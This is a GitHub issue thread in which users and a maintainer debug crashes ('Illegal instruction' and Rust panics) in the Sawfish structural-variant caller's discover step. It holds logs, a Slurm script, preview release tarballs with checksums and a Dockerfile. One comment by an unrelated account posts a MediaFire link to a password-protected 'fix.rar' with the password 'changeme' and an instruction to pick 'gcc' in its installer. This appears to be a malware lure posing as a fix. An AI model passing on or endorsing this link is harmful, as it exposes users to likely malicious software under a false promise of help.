### ISSUE TITLE
Discover step stability issue on minimap aligned input bam

### ISSUE THREAD

**Issue by ctsa** [PacificBiosciences/sawfish#3]
_Originally posted by @jamesc99 in https://github.com/PacificBiosciences/sawfish/issues/2#issuecomment-2310789812_

----
            
Hi, 

after running Sawfish v0.12.2, the previous error in #1 has been fixed. However, I got another error regarding 'discover' step.

```
[2024-08-25][11:24:45][sawfish][INFO] Starting sawfish
[2024-08-25][11:24:45][sawfish][INFO] cmdline: sawfish discover --bam /users/u250191/ryan_scratch_ln/benchmark_inv/rawdata/hg002/pacbio/minimap2/sorted_PacBio_HG002_m54238_180916_191625.Q20.fastq.bam --ref /users/u250191/ryan_scratch_ln/reference/human-grch38.fasta
[2024-08-25][11:24:45][sawfish][INFO] Running on 8 threads
[2024-08-25][11:24:45][sawfish][INFO] Writing discover settings to file: 'sawfish_discover_output/discover.settings.json'
[2024-08-25][11:24:45][sawfish][INFO] Reading reference genome from file '/users/u250191/ryan_scratch_ln/reference/human-grch38.fasta'
[2024-08-25][11:25:21][sawfish][INFO] Processing alignment file '/users/u250191/ryan_scratch_ln/benchmark_inv/rawdata/hg002/pacbio/minimap2/sorted_PacBio_HG002_m54238_180916_191625.Q20.fastq.bam'
[2024-08-25][11:30:21][sawfish][INFO] Processed alignments on 3,037,641 of 3,088,286 ref genome kb (98%)
[2024-08-25][11:30:25][sawfish][INFO] Finished processing all alignments
[2024-08-25][11:30:25][sawfish][INFO] Writing max sv depth genome regions to bed file: 'sawfish_discover_output/max.depth.bed'
[2024-08-25][11:30:25][sawfish][INFO] Getting depth bin GC content
[2024-08-25][11:30:29][sawfish][INFO] Getting GC depth correction levels
[2024-08-25][11:30:29][sawfish][INFO] Completing breakpoint observation clustering
[2024-08-25][11:30:30][sawfish][INFO] Finished breakpoint observation clustering
[2024-08-25][11:30:30][sawfish][INFO] Consolidating adjacent indel candidates
[2024-08-25][11:30:30][sawfish][INFO] Finding large insertion candidates
[2024-08-25][11:30:30][sawfish][INFO] Writing breakpoint_cluster debug bed file: 'sawfish_discover_output/debug.breakpoint_clusters.bed'
[2024-08-25][11:30:31][sawfish][INFO] Refining SV Candidates
[2024-08-25][11:30:31][sawfish][INFO] Writing debug assembly region bed file: 'sawfish_discover_output/assembly.regions.bed'
[2024-08-25][11:30:31][sawfish][INFO] Starting refinement of breakpoint evidence clusters 
/var/spool/slurm/d/job540156/slurm_script: line 34: 2827442 Illegal instruction     (core dumped) sawfish discover --bam $input_bam --ref $ref38
```

all bam files were aligned by minimap2 with code  `$minimap -Y -ax map-hifi -R "@RG\tSM:${INFOR}\tID:${RG_ID}" $ref38 $FASTQ_FILE --MD -t 8`. Some of them worked while some of them failed due to error above.

my script to run sawfish is attached below:
```
#!/bin/bash
#SBATCH --job-name=sawfish
#SBATCH --output=%x_%A_%a.out
#SBATCH --error=%x_%A_%a.err
#SBATCH --ntasks=1
#SBATCH --cpus-per-task=8
#SBATCH --mem=64gb
#SBATCH --time=72:00:00
#SBATCH --partition=medium
#SBATCH -A proj-fs0002

# Load necessary modules or source conda
source /users/u250191/.bashrc
mamba activate sawfish

# Set reference and work directory
ref38="/users/u250191/ryan_scratch_ln/reference/human-grch38.fasta"
WORK_DIR=$(pwd)

# Set input parameters
input_bam=$1

# Ensure all parameters are provided
if [ -z "$input_bam" ] ; then
    echo "Usage: sbatch script.sh <input_bam>"
    exit 1
fi

# Step 1: sawfish discover
sawfish discover --bam $input_bam --ref $ref38

# Step 2: sawfish joint-call
sawfish joint-call --sample sawfish_discover_output
```

I initially thought this was due to a memory issue and I increased it to 144 GB on a 30x coverage BAM file, and sawfish failed again. Because you mentioned the mem per core should be less than 8 gb, in which case I may need instruction from your side.

Thanks again for your time,
Best!

**Comment by ctsa** [comment]
Thanks @jamesc99, I'm pulling this out into a separate issue.

The easiest way to address this issue is if this is if you are using a bam file you can share with us, I could try to reproduce on our end. Let me know if that's the case and I can work with you separately on the details. If that's not the case I can suggest some other steps, but please let me know if you have a shareable failure case first.

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jamesc99** [comment]
Hi @ctsa , thanks so much for your timely response!

I upload two test data, one was aligned with minimap2 while another was aligned with [VACmap](https://github.com/micahvista/VACmap)

Could you please help me check on those bam files?

Ryan

[test_hg002_pacbio_minimap2.zip](https://github.com/user-attachments/files/16756594/test_hg002_pacbio_minimap2.zip)
[test_hg002_pacbio_vacmap.zip](https://github.com/user-attachments/files/16756595/test_hg002_pacbio_vacmap.zip)

**Comment by ctsa** [comment]
Thank you for sharing your data, I'm looking into both examples. Since pbmm2 is the only officially supported aligner I'd also suggest you try that out with sawfish if you'd like to get this running. For the other read mappers, I agree that no matter the support level we shouldn't have the method segfaulting on any of these inputs.

**Comment by ctsa** [comment]
Hi @jamesc99 ,

Here's what we've tried so far:
1. We ran sawfish on both of the above BAMs as you describe and can't reproduce an error.
2. We repeated these tests on valgrind and can't see any issues.

This made me wonder if the static binary could be having some portability issues.... I don't have a good guess as to what,  since we haven't gotten such reports so far, but things like AVX2 opcodes on less recent systems come to mind as a possibility. This seems a bit less likely given that (I believe) you report seeing some of your bams working but not others.

Just in case, I've had it on my list to dockerize the release build system anyway, so I wanted to ask if you could try the following preview release, built with our new docker-based system:

[sawfish-v0.12.3-x86_64-unknown-linux-gnu.tar.gz](https://github.com/user-attachments/files/16804056/sawfish-v0.12.3-x86_64-unknown-linux-gnu.tar.gz)
sha256: `618b4d77078b858ce3d6d1918d830169608730f3ee3fe186fa5ed81cacea340c`

....it will be helpful to know if you still see the problem on this build. If so I'll try to suggest some other ways we could make progress.

**Comment by jamesc99** [comment]
Hi @ctsa ,

I continuously failed to run Sawfish even with v0.12.3 and the test data I provided to you. I agree it might be the issue come from AVX2 after some testing and googling. 
Considering I cannot change the configuration of our slurm server. Is there any alternative way to run Sawfish?

Thank you!

**Comment by ctsa** [comment]
Thanks for giving the test binary a try.

I will do some more investigation of this issue. AVX2 is just a guess so it's hard to trial something as specific as your suggestion without confirmation that this is the relevant problem.

There's some additional information from you that would be helpful if you can share it:

1. Are you able to run any of our other rust tools on this slurm cluster (TRGT, HiFiCNV, pb-CpG-tools, StarPhase, etc...)?
2. Can you share the OS version?
3. Can you share the CPU model?

...if you are able to run a very similar tool like HiFiCNV on your cluster with these bams then I think the difference narrows down to a smaller set of libraries only used by sawfish.

**Comment by jamesc99** [comment]
Hi @ctsa ,

I would be happy to help with this! But could you please build the docker image first so that I can run Sawfish on my samples? That will be extremely helpful :)

Best,
Ryan

**Comment by ctsa** [comment]
The above-shared binary link and the now official release of v0.12.3 is already built in docker, so I'm not clear on what else we could provide?

**Comment by jamesc99** [comment]
@ctsa ,

Thanks for your quick response. Considering it might be an environmental issue, building a Docker image would possibly solve this issue.

Thank you

**Comment by ctsa** [comment]
Thank you, I see.

I don't think we have any plans to release a runtime docker image since sawfish is already a single binary file with no other package dependencies, but in case this test could help clarify the issue, a simple sawfish docker runner could be created from a docker file like this:

```dockerfile
FROM ubuntu:22.04

ENV DEBIAN_FRONTEND=noninteractive 
RUN apt-get -qq update && \
    apt-get install -y -q \
    curl

ENV SAWFISH_HOME=/opt/sawfish \
    PATH=/opt/sawfish/bin:$PATH \
    SAWFISH_VERSION=v0.12.3

RUN mkdir -p ${SAWFISH_HOME} && \
    curl -sL https://github.com/PacificBiosciences/sawfish/releases/download/${SAWFISH_VERSION}/sawfish-${SAWFISH_VERSION}-x86_64-unknown-linux-gnu.tar.gz | tar --strip-components=1 -xz -C $SAWFISH_HOME
```

from:

    docker build -t sawfish:latest .

**Comment by ctsa** [comment]
Thanks @jamesc99,

This shows a few places we could improve error messages for similar cases. I haven't been able to tell from the attached cigars what could be causing this error. In theory it might come up from a read which starts or ends on an insertion, but I don't see that in the examples you've pasted. I'll get an update with some improved error messages and a few other hardening/trace options soon. 

Ideally I'd also like to root-cause the minimap2 issue so that it wouldn't have to be run in Docker, but that will probably have to wait since I don't have a good guess as to what could be happening if it's giving you a SIGILL on direct binary runs but working in docker.

**Comment by jamesc99** [comment]
Hi @ctsa 

I was just informed that VACmap incorrectly output segments with only clipped sequences without any match or mismatch sequences, as in the example below. Although these segments are practically unaligned, they are flagged as aligned, causing some problems for some callers.
for example: 
`m54328_180928_230446/57803164/ccs       2048    chr17   26938531        60      13520S  *       0       0       TCAAATGGAATGGAATCGAAATGGATG...`

I am not sure if this is the reason to make Sawfish fail but I hope it can help. 

Thanks for your help and time!
Ryan

**Comment by ctsa** [comment]
Hi @jamesc99 ,  I have another pre-release sawfish version with minor changes to get more information about the issues you've reported.

The first change should replace the panic with a more specific error and read QNAME for the failure you've reported from the VACmap bam.

The second change is more general, there is a new user `--debug` command that will write out extra detail which might be useful for cases like the SIGILL problem. If using this flag, I recommend also setting `--threads 1` so that the debug log messages can be easily associated with the failing thread.

Here is the pre-release tarball:

[sawfish-v0.12.3-8-gfb86ec3-x86_64-unknown-linux-gnu.tar.gz](https://github.com/user-attachments/files/16939760/sawfish-v0.12.3-8-gfb86ec3-x86_64-unknown-linux-gnu.tar.gz)
sha256: `daa46a0867ef160b2aa358b714d010efc27a9894eab164edd44119ad145397be`

**Comment by jamesc99** [comment]
Hi @ctsa 

This update has been very helpful! I found a potential issue when running with `--debug` mode. 

Error information after removing all reads have QNAME issue:
```
[2024-09-10][12:07:11][sawfish][INFO] Starting sawfish
[2024-09-10][12:07:11][sawfish][INFO] cmdline: /opt/sawfish/bin/sawfish --debug discover --bam /mnt/input_bam_dir/sorted_hg002_pacbio_vacmap_HG002_m54238_180916_191625.Q20.bam --ref /mnt/reference/human-grch38.fasta --output-dir /mnt/workdir/sawfish_discover_output
[2024-09-10][12:07:11][sawfish][INFO] Running on 8 threads
[2024-09-10][12:07:11][sawfish][INFO] Writing discover settings to file: '/mnt/workdir/sawfish_discover_output/discover.settings.json'
[2024-09-10][12:07:11][sawfish][INFO] Reading reference genome from file '/mnt/reference/human-grch38.fasta'
[2024-09-10][12:09:09][sawfish][INFO] Processing alignment file '/mnt/input_bam_dir/sorted_hg002_pacbio_vacmap_HG002_m54238_180916_191625.Q20.bam'
thread '<unnamed>' panicked at lib/rust-vc-utils/src/bam_utils/util.rs:187:9:
Invalid read position 14508, exceeds the read_length 14508, in read m54238_180927_233325/28771159/ccs
stack backtrace:
   0:           0x7c6295 - <std::sys::backtrace::BacktraceLock::print::DisplayBacktrace as core::fmt::Display>::fmt::h1b9dad2a88e955ff
   1:           0x8e221b - core::fmt::write::h4b5a1270214bc4a7
   2:           0x7c3abf - std::io::Write::write_fmt::hd04af345a50c312d
   3:           0x7c73d1 - std::panicking::default_hook::{{closure}}::h96ab15e9936be7ed
   4:           0x7c70ac - std::panicking::default_hook::h3cacb9c27561ad33
   5:           0x7c7a31 - std::panicking::rust_panic_with_hook::hfe205f6954b2c97b
   6:           0x7c7897 - std::panicking::begin_panic_handler::{{closure}}::h6cb44b3a50f28c44
   7:           0x7c6759 - std::sys::backtrace::__rust_end_short_backtrace::hf1c1f2a92799bb0e
   8:           0x7c7524 - rust_begin_unwind
   9:           0x416c83 - core::panicking::panic_fmt::h3d8fc78294164da7
  10:           0x5f1c70 - rust_vc_utils::bam_utils::util::get_reverse_read_position::h1c0ed9c0637212c2
  11:           0x4b00be - sawfish::cluster_breakpoints::break_builder::BreakBuilder::process_bam_record::h4213b0cea8f4eb94
  12:           0x46331f - sawfish::bam_scanner::scan_chromosome_segment::hcaaf07374530c89e
  13:           0x49d57e - rayon_core::scope::ScopeBase::execute_job_closure::h6ba11f4b30263c76
  14:           0x4cae7d - <rayon_core::job::HeapJob<BODY> as rayon_core::job::Job>::execute::h23dbd4a0e8a534e3
/var/spool/slurm/d/job544968/slurm_script: line 55: 2029634 Aborted                 (core dumped) RUST_BACKTRACE=full apptainer exec -B /users/u250191/ryan_scratch_ln/reference:/mnt/reference -B $input_bam_dir:/mnt/input_bam_dir -B $WOR
```

so it seems like the error was generated by inconsistency among CIGAR and read length:
`Invalid read position 14508, exceeds the read_length 14508, in read m54238_180927_233325/28771159/ccs`

However, when I looked at that read, the CIGAR length and read length are the same. Below is what I did:
step1 (extract problematic region from BAM):
`$samtools view -@8 $bamfile | grep "$error_read" > error_read_part.txt`
step2 (compare the length of CIGAR and read):
```
from cigar import Cigar

with open('error_read_part_pacbio_vacmap.txt') as f:
    for line in f.readlines():
        cigar = line.split('\t')[5]
        read_seq = line.split('\t')[9]
        print(len(Cigar(cigar)) == len(read_seq))
```


I attached the extracted problematic region for your debug. 

Thanks again for your time and help!
Ryan
[error_read_part_pacbio_vacmap.txt](https://github.com/user-attachments/files/16969117/error_read_part_pacbio_vacmap.txt)

**Comment by ctsa** [comment]
Thanks for sharing the example read alignments.

I haven't been able to reproduce this problem from the example.

As a first question I'm trying to understand how the primary attached read, with a MAPQ of 1, was processed by sawfish, which filters out reads with a MAPQ < 10.

I went ahead and created a BAM file from the above example read alignments, and ran that on sawfish with a reduced minimum MAPQ, but couldn't reproduce any problem (including using the above 0.12.3-8... preview binary).

Nonetheless, I loaded the primary & supplemental reads into a unit test on the break_builder process from the above stack trace. I also could not get that process to fail.

We're continuing to have some interesting reproducibility challenges here, and I'm struggling to explain these. It's an outside shot, but can you describe the your locale settings? (you should just be able to type `locale` on your system) I wonder if a locale difference could be complicating something here -- If you try prepending your sawfish command with `LC_ALL=C `, does this change anything?

**Comment by jamesc99** [comment]
Hi @ctsa 

for the MAPQ part that was a great point. I am trying to understand why as well.

For local settings, here are the results which look normal:
```
locale
LANG=en_US.UTF-8
LC_CTYPE="en_US.UTF-8"
LC_NUMERIC="en_US.UTF-8"
LC_TIME="en_US.UTF-8"
LC_COLLATE="en_US.UTF-8"
LC_MONETARY="en_US.UTF-8"
LC_MESSAGES="en_US.UTF-8"
LC_PAPER="en_US.UTF-8"
LC_NAME="en_US.UTF-8"
LC_ADDRESS="en_US.UTF-8"
LC_TELEPHONE="en_US.UTF-8"
LC_MEASUREMENT="en_US.UTF-8"
LC_IDENTIFICATION="en_US.UTF-8"
LC_ALL=
```
results of `hostnamectl`:
  ```
 Static hostname: 
         Icon name: computer-vm
           Chassis: vm
        Machine ID: 0385468ce03647f1ae645be8bdcf2288
           Boot ID: 4d05c1ceb8c342f2b211177a83fc8610
    Virtualization: vmware
  Operating System: CentOS Stream 8
       CPE OS Name: cpe:/o:centos:centos:8
            Kernel: Linux 4.18.0-553.6.1.el8.x86_64
      Architecture: x86-64
```


thank you!

**Comment by ctsa** [comment]
Hi @jamesc99 , I've just noticed that these reads contain a complete set of auxiliary bam flags that I would expect to see in minimap2 output (such as s1/s2/de..). Is it possible these reads were extracted from the minimap2 bam instead of VACmap?

**Comment by jamesc99** [comment]
Hi @ctsa 

Thanks for pointing that out. VACmap aligned the bam file with the FASTQ file extracted from minimap2-aligned BAM. Do you think if those tags/flags have impact on SV calling?

Thank you!

**Comment by ctsa** [comment]
No, I don't think the flags themselves would be a problem, just wanted to check against a possible mixup between the bam that failed in the above test and a possible second bam file used to extract the error read. However unlikely, this scenario would explain our observations.

**Comment by ctsa** [comment]
I'm going to go ahead and release the version I previewed to you as 0.12.4 so we can get the existing updates out there.

I'm not sure how to make further progress on the issue at this time, my intuition given some of our observations like the MAPQ values in the example reads is that they could have been abstracted from a bam other than the problem case -- if that doesn't seem like a possibility to you then we're in a difficult position, because that is a relatively simple filter that I struggle to imagine having some kind of platform specific behavior.

Thanks for sharing so much issue detail so far. If you have additional ideas please let me know -- otherwise best I can do is pencil in an independent test on VACmap here in the future.

**Comment by looxon93** [comment]
Hi I also, have this `Illegal instruction` issue. I was trying Sawfish 0.12.6 installed with conda on my server, using BAM file aligned with [this]( https://github.com/PacificBiosciences/HiFi-human-WGS-WDL) workflow, so PBMM2. 

This is the command line I was using: 
`sawfish discover --output-dir discover_dir --threads 1 --debug --bam "CPI503.CAGRF230615063_503.hifi_reads.GRCh38.aligned.bam" --ref "human_GRCh38_no_alt_analysis_set.fasta" --clobber`

And error I got was: 


```
[2024-10-17][04:28:22][sawfish][INFO] Starting sawfish 0.12.6
[2024-10-17][04:28:22][sawfish][INFO] cmdline: sawfish discover --output-dir discover_dir --threads 1 --debug --bam /data/genieus_ggwgs/data/luka/PacBio_WDL_test/CPI503_new_wdl_2/results/CPI503.CAGRF230615063_503.hifi_reads.GRCh38.aligned.bam --ref /data/genieus_ggwgs/reference_files/pacbio-wdl-humanwgs-dataset/GRCh38/human_GRCh38_no_alt_analysis_set.fasta --clobber
[2024-10-17][04:28:22][sawfish][INFO] Running on 1 threads
[W::hts_idx_load3] The index file is older than the data file: /data/genieus_ggwgs/data/luka/PacBio_WDL_test/CPI503_new_wdl_2/results/CPI503.CAGRF230615063_503.hifi_reads.GRCh38.aligned.bam.bai
[2024-10-17][04:28:22][sawfish][INFO] Writing discover settings to file: 'discover_dir/discover.settings.json'
[2024-10-17][04:28:22][sawfish][INFO] Reading reference genome from file '/data/genieus_ggwgs/reference_files/pacbio-wdl-humanwgs-dataset/GRCh38/human_GRCh38_no_alt_analysis_set.fasta'
[W::hts_idx_load3] The index file is older than the data file: /data/genieus_ggwgs/data/luka/PacBio_WDL_test/CPI503_new_wdl_2/results/CPI503.CAGRF230615063_503.hifi_reads.GRCh38.aligned.bam.bai
[2024-10-17][04:28:31][sawfish][INFO] Processing alignment file '/data/genieus_ggwgs/data/luka/PacBio_WDL_test/CPI503_new_wdl_2/results/CPI503.CAGRF230615063_503.hifi_reads.GRCh38.aligned.bam'
[2024-10-17][04:41:23][sawfish][INFO] Finished processing all alignments
[2024-10-17][04:41:23][sawfish][INFO] Writing max sv depth genome regions to bed file: 'discover_dir/max.depth.bed'
[2024-10-17][04:41:23][sawfish][INFO] Getting depth bin GC content
[2024-10-17][04:41:57][sawfish][INFO] Getting GC depth correction levels
[2024-10-17][04:41:57][sawfish][INFO] Completing breakpoint observation clustering
[2024-10-17][04:41:57][sawfish][INFO] Finished breakpoint observation clustering
[2024-10-17][04:41:57][sawfish][INFO] Consolidating adjacent indel candidates
[2024-10-17][04:41:57][sawfish][INFO] Finding large insertion candidates
[2024-10-17][04:41:57][sawfish][INFO] Writing breakpoint_cluster debug bed file: 'discover_dir/debug.breakpoint_clusters.bed'
[2024-10-17][04:41:58][sawfish][INFO] Refining SV Candidates
[2024-10-17][04:41:58][sawfish][INFO] Writing debug assembly region bed file: 'discover_dir/assembly.regions.bed'
[2024-10-17][04:41:58][sawfish][INFO] Starting refinement of breakpoint evidence clusters
[2024-10-17][04:41:58][sawfish][DEBUG] Cluster 45224: Starting refine_sv_candidate_breakpoint on worker thread 0. Regions: chrUn_GL000218v1:105219-105220
[2024-10-17][04:41:58][sawfish][DEBUG] Cluster 45224: refine_sv_candidate_breakpoint: Trimmed read count 17
[2024-10-17][04:41:58][sawfish][DEBUG] Cluster 45224: refine_sv_candidate_breakpoint: Assemblies count 1
Illegal instruction
```


Can you help to troubleshoot this?

**Comment by looxon93** [comment]
Hi @ctsa , I tried your release and it works fine. Thanks for fixing it. I won't share log as it is too large because of `--debug` mode, but I got the results back. 

Regarding results, I didn't have much time to inspect it, but from what I can see, it creates more duplicate positions (not the exact same INDELs) than PBSV. Is there a way to control that somehow? 

Thanks a lot for this fix, 
Luka.

**Comment by ctsa** [comment]
Folks - I issued the fix tested by @looxon93 as a new v0.12.7 update:

https://github.com/PacificBiosciences/sawfish/releases/tag/v0.12.7

@jamesc99, hopefully this addresses your issue as well. If you are still getting SIGILLs with the latest build let's discuss it as a new issue, I'm going to wrap this one up.

**Comment by jamesc99** [comment]
Hi @ctsa 

Thanks for your efforts on this. I tried the latest version and are still having the same issue
```
[2024-10-30][09:47:25][sawfish][INFO] Starting sawfish 0.12.7
[2024-10-30][09:47:25][sawfish][INFO] cmdline: sawfish --threads 8 discover --bam /users/u250191/ryan_scratch_ln/benchmark_inv/rawdata/hg002/pacbio/vacmap/clean_bam/sorted_hg002_pacbio_vacmap_HG002_m54238_180916_191625.Q20.bam --ref /users/u250191/ryan_scratch_ln/reference/human-grch38.fasta
[2024-10-30][09:47:25][sawfish][INFO] Running on 8 threads
[2024-10-30][09:47:25][sawfish][INFO] Writing discover settings to file: 'sawfish_discover_output/discover.settings.json'
[2024-10-30][09:47:25][sawfish][INFO] Reading reference genome from file '/stornext/snfs4/next-gen/scratch/ryan/reference/human-grch38.fasta'
[2024-10-30][09:47:37][sawfish][INFO] Processing alignment file '/stornext/snfs4/next-gen/scratch/ryan/benchmark_inv/rawdata/hg002/pacbio/vacmap/clean_bam/sorted_hg002_pacbio_vacmap_HG002_m54238_180916_191625.Q20.bam'
thread '<unnamed>' panicked at src/cluster_breakpoints/break_builder.rs:231:17:
Unexpected insertion size 0 and read_pos 0 in read: m54238_180919_165326/52560786/ccs
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
/var/spool/slurm/d/job578912/slurm_script: line 34: 3063350 Aborted                 (core dumped) sawfish --threads 8 discover --bam $input_bam --ref $ref38
```

I agree to leave this issue here. 

Thanks again for your help!
Ryan
